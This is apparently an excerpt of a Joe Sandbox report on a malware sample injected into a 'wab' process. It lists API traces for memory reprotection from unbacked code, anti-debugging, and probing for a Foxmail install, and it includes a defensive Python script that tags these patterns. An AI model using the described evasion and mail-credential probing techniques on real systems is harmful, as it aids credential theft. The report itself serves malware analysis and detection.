6928->6929 6952 21cb11ea 6929->6952 6932->6910 6934 21cb2c40 ___scrt_fastfail 6933->6934 6935 21cb1ea7 lstrcatW lstrlenW 6934->6935 6936 21cb1ec2 6935->6936 6937 21cb1ed1 lstrcatW 6935->6937 6936->6937 6938 21cb1ec7 lstrlenW 6936->6938 6937->6926 6938->6937 6940 21cb1747 ___scrt_fastfail 6939->6940 6967 21cb1cca 6940->6967 6943 21cb199f 6943->6932 6945 21cb1824 ___scrt_fastfail _strlen 6945->6943 6987 21cb15da 6945->6987 6948 21cb1e29 6947->6948 6951 21cb1e4c 6947->6951 6949 21cb1e2d lstrlenW 6948->6949 6948->6951 6950 21cb1e3f lstrlenW 6949->6950 6949->6951 6950->6951 6951->6925 6953 21cb120e ___scrt_fastfail 6952->6953 6954 21cb1e89 5 API calls 6953->6954 6955 21cb1220 GetFileAttributesW 6954->6955 6956 21cb1246 6955->6956 6958 21cb1235 6955->6958 6957 21cb1e89 5 API calls 6956->6957 6960 21cb1258 6957->6960 6958->6956 6959 21cb173a 35 API calls 6958->6959 6959->6956 6961 21cb10f1 56 API calls 6960->6961 6962 21cb126d 6961->6962 6963 21cb1e89 5 API calls 6962->6963 6964 21cb127f ___scrt_fastfail 6963->6964 6965 21cb10f1 56 API calls 6964->6965 6966 21cb12e6 6965->6966 6966->6932 6968 21cb1cf1 ___scrt_fastfail 6967->6968 6969 21cb1d0f CopyFileW CreateFileW 6968->6969 6970 21cb1d55 GetFileSize 6969->6970 6971 21cb1d44 DeleteFileW 6969->6971 6972 21cb1ede 22 API calls 6970->6972 6976 21cb1808 6971->6976 6973 21cb1d66 ReadFile 6972->6973 6974 21cb1d7d CloseHandle DeleteFileW 6973->6974 6975 21cb1d94 CloseHandle DeleteFileW 6973->6975 6974->6976 6975->6976 6976->6943 6977 21cb1ede 6976->6977 6979 21cb222f 6977->6979 6980 21cb224e 6979->6980 6983 21cb2250 6979->6983 6995 21cb474f 6979->6995 7000 21cb47e5 6979->7000 6980->6945 6982 21cb2908 6984 21cb35d2 __CxxThrowException@8 RaiseException 6982->6984 6983->6982 7007 21cb35d2 6983->7007 6985 21cb2925 6984->6985 6985->6945 6988 21cb160c _strcat _strlen 6987->6988 6989 21cb163c lstrlenW 6988->6989 7095 21cb1c9d 6989->7095 6991 21cb1655 lstrcatW lstrlenW 6992 21cb1678 6991->6992 6993 21cb167e lstrcatW 6992->6993 6994 
21cb1693 ___scrt_fastfail 6992->6994 6993->6994 6994->6945 7010 21cb4793 6995->7010 6998 21cb478f 6998->6979 6999 21cb4765 7016 21cb2ada 6999->7016 7005 21cb56d0 __dosmaperr 7000->7005 7001 21cb570e 7029 21cb6368 7001->7029 7003 21cb56f9 RtlAllocateHeap 7004 21cb570c 7003->7004 7003->7005 7004->6979 7005->7001 7005->7003 7006 21cb474f __dosmaperr 7 API calls 7005->7006 7006->7005 7008 21cb35f2 RaiseException 7007->7008 7008->6982 7011 21cb479f ___DestructExceptionObject 7010->7011 7023 21cb5671 RtlEnterCriticalSection 7011->7023 7013 21cb47aa 7024 21cb47dc 7013->7024 7015 21cb47d1 _abort 7015->6999 7017 21cb2ae3 7016->7017 7018 21cb2ae5 IsProcessorFeaturePresent 7016->7018 7017->6998 7020 21cb2b58 7018->7020 7028 21cb2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7020->7028 7022 21cb2c3b 7022->6998 7023->7013 7027 21cb56b9 RtlLeaveCriticalSection 7024->7027 7026 21cb47e3 7026->7015 7027->7026 7028->7022 7032 21cb5b7a GetLastError 7029->7032 7033 21cb5b99 7032->7033 7034 21cb5b93 7032->7034 7039 21cb5bf0 SetLastError 7033->7039 7058 21cb637b 7033->7058 7051 21cb5e08 7034->7051 7038 21cb5bb3 7065 21cb571e 7038->7065 7040 21cb5bf9 7039->7040 7040->7004 7044 21cb5bb9 7046 21cb5be7 SetLastError 7044->7046 7045 21cb5bcf 7078 21cb593c 7045->7078 7046->7040 7049 21cb571e _free 17 API calls 7050 21cb5be0 7049->7050 7050->7039 7050->7046 7083 21cb5c45 7051->7083 7053 21cb5e2f 7054 21cb5e47 TlsGetValue 7053->7054 7055 21cb5e3b 7053->7055 7054->7055 7056 21cb2ada _ValidateLocalCookies 5 API calls 7055->7056 7057 21cb5e58 7056->7057 7057->7033 7064 21cb6388 __dosmaperr 7058->7064 7059 21cb63c8 7061 21cb6368 __dosmaperr 19 API calls 7059->7061 7060 21cb63b3 RtlAllocateHeap 7062 21cb5bab 7060->7062 7060->7064 7061->7062 7062->7038 7071 21cb5e5e 7062->7071 7063 21cb474f __dosmaperr 7 API calls 7063->7064 7064->7059 7064->7060 7064->7063 7066 21cb5729 HeapFree 7065->7066 7067 21cb5752 __dosmaperr 7065->7067 7066->7067 7068 21cb573e 
7066->7068 7067->7044 7069 21cb6368 __dosmaperr 18 API calls 7068->7069 7070 21cb5744 GetLastError 7069->7070 7070->7067 7072 21cb5c45 __dosmaperr 5 API calls 7071->7072 7073 21cb5e85 7072->7073 7074 21cb5ea0 TlsSetValue 7073->7074 7075 21cb5e94 7073->7075 7074->7075 7076 21cb2ada _ValidateLocalCookies 5 API calls 7075->7076 7077 21cb5bc8 7076->7077 7077->7038 7077->7045 7089 21cb5914 7078->7089 7084 21cb5c71 7083->7084 7085 21cb5c75 __crt_fast_encode_pointer 7083->7085 7084->7085 7086 21cb5ce1 __dosmaperr LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 7084->7086 7088 21cb5c95 7084->7088 7085->7053 7086->7084 7087 21cb5ca1 GetProcAddress 7087->7085 7088->7085 7088->7087 7090 21cb5854 __dosmaperr RtlEnterCriticalSection RtlLeaveCriticalSection 7089->7090 7091 21cb5938 7090->7091 7092 21cb58c4 7091->7092 7093 21cb5758 __dosmaperr 20 API calls 7092->7093 7094 21cb58e8 7093->7094 7094->7049 7096 21cb1ca6 _strlen 7095->7096 7096->6991 7097 50a635e 7100 50a6396 7097->7100 7098 50a63c1 NtProtectVirtualMemory 7098->7100 7099 50a63b5 Sleep 7099->7097 7100->7097 7100->7098 7100->7099 7101 21cbc7a7 7102 21cbc7be 7101->7102 7111 21cbc82c 7101->7111 7102->7111 7113 21cbc7e6 GetModuleHandleA 7102->7113 7104 21cbc872 7105 21cbc835 GetModuleHandleA 7106 21cbc83f 7105->7106 7106->7106 7108 21cbc85f GetProcAddress 7106->7108 7106->7111 7107 21cbc7dd 7107->7106 7109 21cbc800 GetProcAddress 7107->7109 7107->7111 7108->7111 7110 21cbc80d VirtualProtect 7109->7110 7109->7111 7110->7111 7112 21cbc81c VirtualProtect 7110->7112 7111->7104 7111->7105 7111->7106 7112->7111 7114 21cbc7ef 7113->7114 7120 21cbc82c 7113->7120 7125 21cbc803 GetProcAddress 7114->7125 7116 21cbc872 7117 21cbc835 GetModuleHandleA 7123 21cbc83f 7117->7123 7118 21cbc7f4 7119 21cbc800 GetProcAddress 7118->7119 7118->7120 7119->7120 7121 21cbc80d VirtualProtect 7119->7121 7120->7116 7120->7117 7120->7123 7121->7120 7122 21cbc81c VirtualProtect 7121->7122 7122->7120 7123->7120 7124 21cbc85f GetProcAddress 
7123->7124 7124->7120 7126 21cbc82c 7125->7126 7127 21cbc80d VirtualProtect 7125->7127 7129 21cbc872 7126->7129 7130 21cbc835 GetModuleHandleA 7126->7130 7127->7126 7128 21cbc81c VirtualProtect 7127->7128 7128->7126 7132 21cbc83f 7130->7132 7131 21cbc85f GetProcAddress 7131->7132 7132->7126 7132->7131

                                Control-flow Graph

                                APIs
                                • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 21CB1137
                                • lstrcatW.KERNEL32(?,?), ref: 21CB1151
                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21CB115C
                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21CB116D
                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21CB117C
                                • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21CB1193
                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 21CB11D0
                                • FindClose.KERNEL32(00000000), ref: 21CB11DB
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                • String ID:
                                • API String ID: 1083526818-0
                                • Opcode ID: bfff8f8e6e575ec695ef272e4fd8bda8d49e69e1831fc26d8bddf9ee80969126
                                • Instruction ID: cae9508f1dc7610b48ce0f4b745f083b50a9ec705fc0581b3dcca13be2805273
                                • Opcode Fuzzy Hash: bfff8f8e6e575ec695ef272e4fd8bda8d49e69e1831fc26d8bddf9ee80969126
                                • Instruction Fuzzy Hash: C821A276544309ABD724EBA4AC4CF9B7BDCEF84354F00092AFA69D3190EB35D7048796

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 127 50a635e-50a638b 128 50a6391-50a63a2 call 50a5d75 127->128 130 50a63a9-50a63b3 128->130 131 50a63a4 128->131 132 50a63c1-50a6411 NtProtectVirtualMemory call 50a5d75 130->132 133 50a63b5-50a63bf Sleep 130->133 131->130 135 50a6416-50a6426 132->135 133->127 135->127
                                APIs
                                • Sleep.KERNELBASE(00000005), ref: 050A63B7
                                • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 050A640B
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3408936789.000000000486F000.00000040.00000400.00020000.00000000.sdmp, Offset: 0486F000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_486f000_wab.jbxd
                                Yara matches
                                Similarity
                                • API ID: MemoryProtectSleepVirtual
                                • String ID:
                                • API String ID: 3235210055-0
                                • Opcode ID: 1244ec8c65b153eacd16e49a668e67c96e735789e9d8493ff04901c5278d6264
                                • Instruction ID: 6b785065b55cc1521353c072c2ed6b7b3df8a03820c859397ea5f9f51fb4dc1d
                                • Opcode Fuzzy Hash: 1244ec8c65b153eacd16e49a668e67c96e735789e9d8493ff04901c5278d6264
                                • Instruction Fuzzy Hash: 5E113DB29403416FEB506E74DD8DBD977E0FF243A4F4A8184DD91DB0A5D779C8818B41

                                Control-flow Graph

                                APIs
                                • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 21CB1434
                                  • Part of subcall function 21CB10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 21CB1137
                                  • Part of subcall function 21CB10F1: lstrcatW.KERNEL32(?,?), ref: 21CB1151
                                  • Part of subcall function 21CB10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21CB115C
                                  • Part of subcall function 21CB10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21CB116D
                                  • Part of subcall function 21CB10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21CB117C
                                  • Part of subcall function 21CB10F1: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21CB1193
                                  • Part of subcall function 21CB10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 21CB11D0
                                  • Part of subcall function 21CB10F1: FindClose.KERNEL32(00000000), ref: 21CB11DB
                                • lstrlenW.KERNEL32(?), ref: 21CB14C5
                                • lstrlenW.KERNEL32(?), ref: 21CB14E0
                                • lstrlenW.KERNEL32(?,?), ref: 21CB150F
                                • lstrcatW.KERNEL32(00000000), ref: 21CB1521
                                • lstrlenW.KERNEL32(?,?), ref: 21CB1547
                                • lstrcatW.KERNEL32(00000000), ref: 21CB1553
                                • lstrlenW.KERNEL32(?,?), ref: 21CB1579
                                • lstrcatW.KERNEL32(00000000), ref: 21CB1585
                                • lstrlenW.KERNEL32(?,?), ref: 21CB15AB
                                • lstrcatW.KERNEL32(00000000), ref: 21CB15B7
                                Strings
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                • String ID: )$Foxmail$ProgramFiles
                                • API String ID: 672098462-2938083778
                                • Opcode ID: b32a1f9e33059699f4dbd47db729b57c5580f008335dd1d7de77e90494240990
                                • Instruction ID: cbdcd80ad5824bb8ed19e5572a45eaf751035ca306d38d46386a9a9bcc3eeeb8
                                • Opcode Fuzzy Hash: b32a1f9e33059699f4dbd47db729b57c5580f008335dd1d7de77e90494240990
                                • Instruction Fuzzy Hash: 2681A179A40359E9DB20DBA1EC85FEE7379EF84700F000596F508E7290EA715B85CF95

                                Control-flow Graph

                                APIs
                                • GetModuleHandleA.KERNEL32(21CBC7DD), ref: 21CBC7E6
                                • GetModuleHandleA.KERNEL32(?,21CBC7DD), ref: 21CBC838
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 21CBC860
                                  • Part of subcall function 21CBC803: GetProcAddress.KERNEL32(00000000,21CBC7F4), ref: 21CBC804
                                  • Part of subcall function 21CBC803: VirtualProtect.KERNELBASE(?,00000078,?,?,00000000,00000000,21CBC7F4,21CBC7DD), ref: 21CBC816
                                  • Part of subcall function 21CBC803: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,21CBC7F4,21CBC7DD), ref: 21CBC82A
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: AddressHandleModuleProcProtectVirtual
                                • String ID:
                                • API String ID: 2099061454-0
                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                • Instruction ID: b477053cce76e20fc6257e8ec20e3e795352d60a11660ad15107a00707ca3576
                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                • Instruction Fuzzy Hash: 9F01D21894524AFCBB115674CC01AAA6FDC9B27670B10276AE250CB193D9A38707C3EE

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 79 21cbc7a7-21cbc7bc 80 21cbc7be-21cbc7c6 79->80 81 21cbc82d 79->81 80->81 82 21cbc7c8-21cbc7f6 call 21cbc7e6 80->82 83 21cbc82f-21cbc833 81->83 90 21cbc7f8 82->90 91 21cbc86c-21cbc86e 82->91 85 21cbc872 call 21cbc877 83->85 86 21cbc835-21cbc83d GetModuleHandleA 83->86 88 21cbc83f-21cbc847 86->88 88->88 92 21cbc849-21cbc84c 88->92 93 21cbc85b-21cbc85e 90->93 94 21cbc7fa-21cbc7fe 90->94 96 21cbc870 91->96 97 21cbc866-21cbc86b 91->97 92->83 95 21cbc84e-21cbc850 92->95 101 21cbc85f-21cbc860 GetProcAddress 93->101 102 21cbc800-21cbc80b GetProcAddress 94->102 103 21cbc865 94->103 99 21cbc852-21cbc854 95->99 100 21cbc856-21cbc85a 95->100 96->92 97->91 99->101 100->93 101->103 102->81 104 21cbc80d-21cbc81a VirtualProtect 102->104 103->97 105 21cbc82c 104->105 106 21cbc81c-21cbc82a VirtualProtect 104->106 105->81 106->105
                                APIs
                                • GetModuleHandleA.KERNEL32(?,21CBC7DD), ref: 21CBC838
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 21CBC860
                                  • Part of subcall function 21CBC7E6: GetModuleHandleA.KERNEL32(21CBC7DD), ref: 21CBC7E6
                                  • Part of subcall function 21CBC7E6: GetProcAddress.KERNEL32(00000000,21CBC7F4), ref: 21CBC804
                                  • Part of subcall function 21CBC7E6: VirtualProtect.KERNELBASE(?,00000078,?,?,00000000,00000000,21CBC7F4,21CBC7DD), ref: 21CBC816
                                  • Part of subcall function 21CBC7E6: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,21CBC7F4,21CBC7DD), ref: 21CBC82A
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: AddressHandleModuleProcProtectVirtual
                                • String ID:
                                • API String ID: 2099061454-0
                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                • Instruction ID: 8e0049d8791bbcfbf3393c143135cc5e2355c36e2eac7f9f050ba9bd03e3a680
                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                • Instruction Fuzzy Hash: E0210B6944828AEFF7128774CC04BA67FD99B17370F19069AD140CB143D5AA8B47C3EE

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 107 21cbc803-21cbc80b GetProcAddress 108 21cbc82d 107->108 109 21cbc80d-21cbc81a VirtualProtect 107->109 112 21cbc82f-21cbc833 108->112 110 21cbc82c 109->110 111 21cbc81c-21cbc82a VirtualProtect 109->111 110->108 111->110 113 21cbc872 call 21cbc877 112->113 114 21cbc835-21cbc83d GetModuleHandleA 112->114 115 21cbc83f-21cbc847 114->115 115->115 117 21cbc849-21cbc84c 115->117 117->112 118 21cbc84e-21cbc850 117->118 119 21cbc852-21cbc854 118->119 120 21cbc856-21cbc85e 118->120 121 21cbc85f-21cbc865 GetProcAddress 119->121 120->121 124 21cbc866-21cbc86e 121->124 126 21cbc870 124->126 126->117
                                APIs
                                • GetProcAddress.KERNEL32(00000000,21CBC7F4), ref: 21CBC804
                                • VirtualProtect.KERNELBASE(?,00000078,?,?,00000000,00000000,21CBC7F4,21CBC7DD), ref: 21CBC816
                                • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,21CBC7F4,21CBC7DD), ref: 21CBC82A
                                • GetModuleHandleA.KERNEL32(?,21CBC7DD), ref: 21CBC838
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 21CBC860
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: AddressProcProtectVirtual$HandleModule
                                • String ID:
                                • API String ID: 2152742572-0
                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                • Instruction ID: f3cf2e633b5b3336b0c22552c29ac0cc8d39c40c8e4c14ce6fd1d0fa24a6b6ab
                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                • Instruction Fuzzy Hash: 01F0C249545249FCFA1246B4CC41EB66FCC8B67670B101A5AE250CB183D8978B0783FE
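                                The three function listings above (the Sleep / NtProtectVirtualMemory loop in the non-PE-backed region at 0486F000, the ProgramFiles / Foxmail / FindFirstFileW path probe, and the GetProcAddress / VirtualProtect pair) each carry a triage signal in their API lines, the "based on PE" flag of the dump they were taken from, and their String ID. The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses function blocks in the shape printed on this page, pulls out the API sequence, the process id that prefixes the dump file name (0000000B here, which the snapshot names tie to the wab process), whether the dump is PE-backed, and the String ID entries, and tags each block with the pattern it matches. The sample text is constructed from the listings above and trimmed to the fields the parser needs; the tag names and the list of mail-client markers are assumptions chosen for this example, and the tags state what the call pattern is consistent with, not a verdict.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample in the shape Joe Sandbox prints per-function listings
# (API lines, Memory Dump Source, Similarity). Trimmed to the fields parsed.
SAMPLE_REPORT = """\
APIs
• Sleep.KERNELBASE(00000005), ref: 050A63B7
• NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 050A640B
Memory Dump Source
• Source File: 0000000B.00000002.3408936789.000000000486F000.00000040.00000400.00020000.00000000.sdmp, Offset: 0486F000, based on PE: false
Similarity
• API ID: MemoryProtectSleepVirtual
• String ID:
• API String ID: 3235210055-0
APIs
• GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 21CB1434
  • Part of subcall function 21CB10F1: FindFirstFileW.KERNELBASE(?), ref: 21CB1193
• lstrcatW.KERNEL32(00000000), ref: 21CB1521
Memory Dump Source
• Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
Similarity
• API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
• String ID: )$Foxmail$ProgramFiles
• API String ID: 672098462-2938083778
APIs
• GetProcAddress.KERNEL32(00000000,21CBC7F4), ref: 21CBC804
• VirtualProtect.KERNELBASE(?,00000078,?,?,00000000,00000000,21CBC7F4,21CBC7DD), ref: 21CBC816
• VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,21CBC7F4,21CBC7DD), ref: 21CBC82A
• GetModuleHandleA.KERNEL32(?,21CBC7DD), ref: 21CBC838
Memory Dump Source
• Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
Similarity
• API ID: AddressProcProtectVirtual$HandleModule
• String ID:
"""

# One API line: optional "Part of subcall function XXXX:" prefix, Name.MODULE(args), ref: addr
API_RE = re.compile(
    r"^\s*(?:•\s*)+(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
SRC_RE = re.compile(
    r"Source File:\s*(?P<file>\S+),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)")
STR_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*)$")   # not "API String ID"

PROTECT_APIS = {"VirtualProtect", "VirtualProtectEx", "NtProtectVirtualMemory"}
RESOLVE_APIS = {"GetProcAddress", "LdrGetProcedureAddress"}
MAIL_CLIENT_MARKERS = {"foxmail", "thunderbird", "outlook"}   # assumption: markers to look for

@dataclass
class FunctionBlock:
    apis: List[Tuple[str, str, str]] = field(default_factory=list)  # (name, MODULE, args)
    pid: Optional[int] = None
    offset: str = ""
    pe_backed: Optional[bool] = None
    strings: List[str] = field(default_factory=list)

def parse_blocks(text: str) -> List[FunctionBlock]:
    blocks, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":            # each listing starts with an "APIs" header
            cur = FunctionBlock()
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            cur.apis.append((m["name"], m["module"].upper(), m["args"] or ""))
            continue
        m = SRC_RE.search(line)
        if m:
            cur.pid = int(m["file"][:8], 16)  # dump names begin with the 8-hex-digit process id
            cur.offset = m["off"]
            cur.pe_backed = m["pe"] == "true"
            continue
        m = STR_RE.match(line)
        if m:
            cur.strings = [s for s in m["ids"].split("$") if s.strip()]
    return blocks

def triage_block(b: FunctionBlock) -> set:
    names = {n for n, _, _ in b.apis}
    tags = set()
    if names & PROTECT_APIS and b.pe_backed is False:
        tags.add("page-protection-change-from-unbacked-memory")   # code not backed by a PE on disk
    if b.pe_backed is False and any(n.startswith("Nt") and mod == "NTDLL" for n, mod, _ in b.apis):
        tags.add("native-api-from-unbacked-memory")               # Nt* called straight from shellcode
    if "Sleep" in names and names & PROTECT_APIS:
        tags.add("sleep-protect-loop")                            # stall-and-reprotect loop
    if names & RESOLVE_APIS and names & PROTECT_APIS:
        tags.add("resolve-export-then-reprotect")                 # export lookup then page rewrite
    probes_programfiles = any(n == "GetEnvironmentVariableW" and a.split(",")[0].strip() == "ProgramFiles"
                              for n, _, a in b.apis)
    if probes_programfiles and "FindFirstFileW" in names and {s.lower() for s in b.strings} & MAIL_CLIENT_MARKERS:
        tags.add("mail-client-install-probe")                     # enumerating a mail client's install dir
    return tags

def triage(text: str) -> List[Tuple[Optional[int], str, List[str]]]:
    return [(b.pid, b.offset, sorted(triage_block(b))) for b in parse_blocks(text)]

if __name__ == "__main__":
    for pid, off, tags in triage(SAMPLE_REPORT):
        print(f"pid={pid} offset={off} tags={tags}")
```

                                Run it against a whole exported report and the blocks worth opening first are those tagged from a dump with "based on PE: false": on this page that is the 0486F000 region in process 0xB, where the Sleep / NtProtectVirtualMemory loop runs from memory no image file accounts for.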
                                APIs
                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 21CB61DA
                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 21CB61E4
                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 21CB61F1
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                • String ID:
                                • API String ID: 3906539128-0
                                • Opcode ID: 27f500169df6425da9b4e736e7297dbfac6d6fe277d9ded82858710b7f17dc75
                                • Instruction ID: 7417e83fddae308d48d36771280996c5ce8eb077d50b95122cd20db2d4988c88
                                • Opcode Fuzzy Hash: 27f500169df6425da9b4e736e7297dbfac6d6fe277d9ded82858710b7f17dc75
                                • Instruction Fuzzy Hash: 3A31D27894122DDBDB21DF64D988B9DBBB8EF18310F5041EAE81CA7260E7349F818F45
                                APIs
                                • GetCurrentProcess.KERNEL32(?,?,21CB4A8A,?,21CC2238,0000000C,21CB4BBD,00000000,00000000,00000001,21CB2082,21CC2108,0000000C,21CB1F3A,?), ref: 21CB4AD5
                                • TerminateProcess.KERNEL32(00000000,?,21CB4A8A,?,21CC2238,0000000C,21CB4BBD,00000000,00000000,00000001,21CB2082,21CC2108,0000000C,21CB1F3A,?), ref: 21CB4ADC
                                • ExitProcess.KERNEL32 ref: 21CB4AEE
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                 • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: Process$CurrentExitTerminate
                                • String ID:
                                • API String ID: 1703294689-0
                                • Opcode ID: 78875ccef41d13e0bbd30cdc91a902f0ec84b16fd313538f6f6def867e4f3584
                                • Instruction ID: bc17d03e52c1404f4d06e8826b454c329ddccac2f07214ee842078a2d3abd568
                                • Opcode Fuzzy Hash: 78875ccef41d13e0bbd30cdc91a902f0ec84b16fd313538f6f6def867e4f3584
                                • Instruction Fuzzy Hash: A8E0123A044209EFCB066F24D908A593B2AEB25385B104014FA06CA021CB3ADA42CB84
                                Strings
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                 • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID:
                                • String ID: .
                                • API String ID: 0-248832578
                                • Opcode ID: bd1cd8ee8225a3ff3634a39525aae2a9e7b43bc3e69347b773f6761d96e38ad8
                                • Instruction ID: c561fce355400876bf8ebb464fb2a4f2c25de32e7ac4071b2732ed036790b633
